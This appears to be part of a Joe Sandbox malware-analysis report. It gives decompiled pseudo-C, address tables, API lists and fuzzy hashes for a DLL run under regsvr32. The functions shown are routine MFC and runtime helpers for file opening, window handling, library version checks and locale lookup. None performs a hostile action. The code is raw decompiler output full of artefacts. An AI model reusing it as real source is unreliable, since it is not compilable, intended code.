					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x10043178);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}











                                                                                                            0x1000b6fa
                                                                                                            0x1000b707
                                                                                                            0x1000b709
                                                                                                            0x1000b70c
                                                                                                            0x1000b70f
                                                                                                            0x1000b714
                                                                                                            0x1000b719
                                                                                                            0x1000b71a
                                                                                                            0x1000b721
                                                                                                            0x1000b72d
                                                                                                            0x1000b736
                                                                                                            0x1000b73f
                                                                                                            0x1000b747
                                                                                                            0x1000b74e
                                                                                                            0x1000b751
                                                                                                            0x1000b754
                                                                                                            0x1000b757
                                                                                                            0x1000b75a
                                                                                                            0x1000b762
                                                                                                            0x1000b765
                                                                                                            0x1000b768
                                                                                                            0x1000b76b
                                                                                                            0x1000b76e
                                                                                                            0x1000b780
                                                                                                            0x1000b78a
                                                                                                            0x1000b795
                                                                                                            0x1000b795
                                                                                                            0x1000b798
                                                                                                            0x1000b79c
                                                                                                            0x1000b7b0
                                                                                                            0x1000b7c2
                                                                                                            0x1000b7ca
                                                                                                            0x1000b7dc
                                                                                                            0x1000b7e4
                                                                                                            0x1000b7f7
                                                                                                            0x1000b7ff
                                                                                                            0x1000b811
                                                                                                            0x1000b819
                                                                                                            0x1000b81f
                                                                                                            0x1000b827
                                                                                                            0x1000b828
                                                                                                            0x1000b82d
                                                                                                            0x1000b833
                                                                                                            0x1000b835
                                                                                                            0x1000b835
                                                                                                            0x1000b838
                                                                                                            0x1000b83e
                                                                                                            0x1000b842
                                                                                                            0x1000b843
                                                                                                            0x1000b84c
                                                                                                            0x1000b852
                                                                                                            0x1000b857
                                                                                                            0x1000b85d
                                                                                                            0x1000b863
                                                                                                            0x1000b866
                                                                                                            0x1000b866
                                                                                                            0x1000b86d
                                                                                                            0x1000b873
                                                                                                            0x1000b876
                                                                                                            0x1000b87b
                                                                                                            0x1000b880
                                                                                                            0x1000b880
                                                                                                            0x1000b887
                                                                                                            0x1000b887
                                                                                                            0x1000b895
                                                                                                            0x1000b89d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariant
                                                                                                            • String ID: @$@
                                                                                                            • API String ID: 1166855276-149943524
                                                                                                            • Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
                                                                                                            • Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025A6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E10025A6D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, CHAR* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v268;
				struct _SECURITY_ATTRIBUTES _v280;
				void* __ebp;
				intOrPtr _t40;
				signed int _t43;
				signed int _t51;
				signed int _t53;
				long _t58;
				void* _t60;
				void* _t69;
				signed int _t73;
				long _t79;
				long _t81;
				void* _t83;
				signed int _t86;
				intOrPtr _t87;

				_t40 =  *0x1004c470; // 0xf3933a06
				_t83 = __ecx;
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
				_t85 = __ecx + 0xc;
				_v8 = _t40;
				_t73 = _a8 & 0xffff7fff;
				E10006935(_t73, __ecx + 0xc);
				if(lstrlenA(_a4) >= 0x104 || E1002592C(_t73, _t83, _t85,  &_v268, _a4) == 0) {
					L30:
					_t43 = 0;
					goto L31;
				} else {
					E10006AEC(_t85,  &_v268);
					_t81 = 3;
					_t51 = _t73 & _t81;
					_a8 = 0;
					if(_t51 == 0) {
						_a8 = 0x80000000;
					} else {
						_t69 = _t51 - 1;
						if(_t69 == 0) {
							_a8 = 0x40000000;
						} else {
							if(_t69 == 1) {
								_a8 = 0xc0000000;
							}
						}
					}
					_t53 = _t73 & 0x00000070;
					_t86 = 1;
					if(_t53 == 0 || _t53 == 0x10) {
						L13:
						_t81 = 0;
						goto L14;
					} else {
						if(_t53 == 0x20) {
							_t81 = _t86;
							L14:
							_v280.nLength = 0xc;
							_v280.lpSecurityDescriptor = 0;
							_v280.bInheritHandle =  !(_t73 >> 7) & _t86;
							if((_t73 & 0x00000010) == 0) {
								_t58 = 3;
							} else {
								asm("sbb eax, eax");
								_t58 = ( ~(_t73 & 0x00002000) & 0x00000002) + 2;
							}
							_t79 = 0x80;
							if((_t73 & 0x00010000) != 0) {
								_t79 = 0x20000080;
							}
							if((_t73 & 0x00020000) != 0) {
								_t79 = _t79 | 0x80000000;
							}
							if((_t73 & 0x00040000) != 0) {
								_t79 = _t79 | 0x10000000;
							}
							if((_t73 & 0x00080000) != 0) {
								_t79 = _t79 | 0x08000000;
							}
							_t60 = CreateFileA(_a4, _a8, _t81,  &_v280, _t58, _t79, 0);
							if(_t60 != 0xffffffff) {
								 *(_t83 + 4) = _t60;
								 *(_t83 + 8) = _t86;
								_t43 = _t86;
								L31:
								return E100117AE(_t43, _v8);
							} else {
								_t87 = _a12;
								if(_t87 != 0) {
									 *((intOrPtr*)(_t87 + 0xc)) = GetLastError();
									 *((intOrPtr*)(_t87 + 8)) = E10026E5B(_t61);
									E10006AEC(_t87 + 0x10, _a4);
								}
								goto L30;
							}
						}
						if(_t53 == 0x30) {
							_t81 = 2;
							goto L14;
						}
						if(_t53 == 0x40) {
							goto L14;
						}
						goto L13;
					}
				}
			}




















                                                                                                            0x10025a76
                                                                                                            0x10025a81
                                                                                                            0x10025a83
                                                                                                            0x10025a87
                                                                                                            0x10025a8b
                                                                                                            0x10025a90
                                                                                                            0x10025a93
                                                                                                            0x10025a99
                                                                                                            0x10025aac
                                                                                                            0x10025be5
                                                                                                            0x10025be5
                                                                                                            0x00000000
                                                                                                            0x10025ac9
                                                                                                            0x10025ad2
                                                                                                            0x10025adb
                                                                                                            0x10025ae0
                                                                                                            0x10025ae2
                                                                                                            0x10025ae5
                                                                                                            0x10025aff
                                                                                                            0x10025ae7
                                                                                                            0x10025ae7
                                                                                                            0x10025ae8
                                                                                                            0x10025af6
                                                                                                            0x10025aea
                                                                                                            0x10025aeb
                                                                                                            0x10025aed
                                                                                                            0x10025aed
                                                                                                            0x10025aeb
                                                                                                            0x10025ae8
                                                                                                            0x10025b08
                                                                                                            0x10025b0d
                                                                                                            0x10025b0e
                                                                                                            0x10025b24
                                                                                                            0x10025b24
                                                                                                            0x00000000
                                                                                                            0x10025b15
                                                                                                            0x10025b18
                                                                                                            0x10025b61
                                                                                                            0x10025b26
                                                                                                            0x10025b32
                                                                                                            0x10025b3c
                                                                                                            0x10025b42
                                                                                                            0x10025b48
                                                                                                            0x10025b67
                                                                                                            0x10025b4a
                                                                                                            0x10025b53
                                                                                                            0x10025b59
                                                                                                            0x10025b59
                                                                                                            0x10025b6e
                                                                                                            0x10025b73
                                                                                                            0x10025b75
                                                                                                            0x10025b75
                                                                                                            0x10025b80
                                                                                                            0x10025b82
                                                                                                            0x10025b82
                                                                                                            0x10025b8e
                                                                                                            0x10025b90
                                                                                                            0x10025b90
                                                                                                            0x10025b9c
                                                                                                            0x10025b9e
                                                                                                            0x10025b9e
                                                                                                            0x10025bb6
                                                                                                            0x10025bbf
                                                                                                            0x10025bf6
                                                                                                            0x10025bf9
                                                                                                            0x10025bfc
                                                                                                            0x10025be7
                                                                                                            0x10025bf3
                                                                                                            0x10025bc1
                                                                                                            0x10025bc1
                                                                                                            0x10025bc6
                                                                                                            0x10025bcf
                                                                                                            0x10025bdd
                                                                                                            0x10025be0
                                                                                                            0x10025be0
                                                                                                            0x00000000
                                                                                                            0x10025bc6
                                                                                                            0x10025bbf
                                                                                                            0x10025b1d
                                                                                                            0x10025b5e
                                                                                                            0x00000000
                                                                                                            0x10025b5e
                                                                                                            0x10025b22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025b22
                                                                                                            0x10025b0e

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10025AA1
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 10025BB6
                                                                                                            • GetLastError.KERNEL32 ref: 10025BC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 4207171074-4125583295
                                                                                                            • Opcode ID: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction ID: b9e8efc14b2e37d74310b66cc6c275d2155126b32d67271340f07ea8c5c0b371
                                                                                                            • Opcode Fuzzy Hash: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction Fuzzy Hash: 2141E771A00615ABEB12CF25EC82BDE77E4EB04391F90C529E917CB1D0DB7AD981CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033B73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
					L6:
					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0xffff2fff | 0x00002000;
						}
					}
					_t74 = E100339A3(_v8, _a16);
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *(_t74 + 0x34) == 0) {
						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
					}
					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E100203AD(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t76 =  *((intOrPtr*)(_t71 + 0x88));
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					goto L13;
				}
			}











                                                                                                            0x10033b73
                                                                                                            0x10033b76
                                                                                                            0x10033b7a
                                                                                                            0x10033b85
                                                                                                            0x10033b88
                                                                                                            0x10033be7
                                                                                                            0x10033beb
                                                                                                            0x10033bed
                                                                                                            0x10033bf5
                                                                                                            0x10033c04
                                                                                                            0x10033c04
                                                                                                            0x10033bf5
                                                                                                            0x10033c19
                                                                                                            0x10033c21
                                                                                                            0x10033c29
                                                                                                            0x10033c2e
                                                                                                            0x10033c2e
                                                                                                            0x10033c41
                                                                                                            0x10033c4c
                                                                                                            0x10033c57
                                                                                                            0x10033c62
                                                                                                            0x10033c76
                                                                                                            0x10033c7a
                                                                                                            0x10033c64
                                                                                                            0x10033c68
                                                                                                            0x10033c6d
                                                                                                            0x10033c70
                                                                                                            0x00000000
                                                                                                            0x10033c70
                                                                                                            0x10033c62
                                                                                                            0x10033b8a
                                                                                                            0x10033b92
                                                                                                            0x00000000
                                                                                                            0x10033bb3
                                                                                                            0x10033bc9
                                                                                                            0x10033bd1
                                                                                                            0x10033bdc
                                                                                                            0x00000000
                                                                                                            0x10033bdc

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10033BB6
                                                                                                              • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                                                            • GetWindowLongA.USER32 ref: 10033C57
                                                                                                            • UpdateWindow.USER32(?), ref: 10033C70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentUpdate
                                                                                                            • String ID: P
                                                                                                            • API String ID: 1906497633-3110715001
                                                                                                            • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                                                            • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034C5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x1004c470; // 0xf3933a06
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
					}
				}
				return E100117AE(_t13, _v8);
			}












                                                                                                            0x10034c68
                                                                                                            0x10034c6e
                                                                                                            0x10034c81
                                                                                                            0x10034c89
                                                                                                            0x10034cd6
                                                                                                            0x10034cd6
                                                                                                            0x10034c8f
                                                                                                            0x10034c8f
                                                                                                            0x10034c90
                                                                                                            0x10034c98
                                                                                                            0x10034ca6
                                                                                                            0x10034ca7
                                                                                                            0x10034cb3
                                                                                                            0x10034cb9
                                                                                                            0x10034cba
                                                                                                            0x10034cbb
                                                                                                            0x00000000
                                                                                                            0x10034cbd
                                                                                                            0x10034cc2
                                                                                                            0x10034ccf
                                                                                                            0x10034ccf
                                                                                                            0x10034cbb
                                                                                                            0x10034ce2

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                                                              • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                                                            • String ID: %s.dll
                                                                                                            • API String ID: 4178508759-3668843792
                                                                                                            • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                                                            • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100364C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E100364C3() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1004b8c8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E10011C50( &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1004b8c8 = _t19;
				return _t19;
			}









                                                                                                            0x100364c9
                                                                                                            0x100364d1
                                                                                                            0x10036530
                                                                                                            0x10036530
                                                                                                            0x100364ec
                                                                                                            0x100364f0
                                                                                                            0x100364f5
                                                                                                            0x100364ff
                                                                                                            0x1003650a
                                                                                                            0x1003650b
                                                                                                            0x10036516
                                                                                                            0x10036523
                                                                                                            0x10036523
                                                                                                            0x10036516
                                                                                                            0x10036525
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: COMCTL32.DLL$DllGetVersion
                                                                                                            • API String ID: 1646373207-1518460440
                                                                                                            • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                                                            • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029A8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t9;
				signed int _t17;

				_t9 =  *0x1004c470; // 0xf3933a06
				_v8 = _t9;
				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					_t10 = 0;
				} else {
					GetClassNameA(_a4,  &_v20, 0xa);
					_t17 = lstrcmpiA( &_v20, "combobox");
					asm("sbb eax, eax");
					_t10 =  ~_t17 + 1;
				}
				return E100117AE(_t10, _v8);
			}







                                                                                                            0x10029a98
                                                                                                            0x10029a9d
                                                                                                            0x10029aa0
                                                                                                            0x10029ab5
                                                                                                            0x10029ab9
                                                                                                            0x10029ac2
                                                                                                            0x10029ad1
                                                                                                            0x10029ad9
                                                                                                            0x10029adb
                                                                                                            0x10029adb
                                                                                                            0x10029ae5

                                                                                                            APIs
                                                                                                            • GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                            • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLongNameWindowlstrcmpi
                                                                                                            • String ID: combobox
                                                                                                            • API String ID: 2054663530-2240613097
                                                                                                            • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                                                            • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019599 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10019599(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x10042d28);
				E10012514(_t13, _t14, _t15);
				_t9 =  *0x1004f820;
				if(_t9 == 0) {
					if( *0x1004f3e0 == 1) {
						L4:
						_t9 = 0x10019589;
						 *0x1004f820 = 0x10019589;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1004f820 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E1001254F(_t10);
			}









                                                                                                            0x10019599
                                                                                                            0x1001959b
                                                                                                            0x100195a0
                                                                                                            0x100195a5
                                                                                                            0x100195ac
                                                                                                            0x100195b5
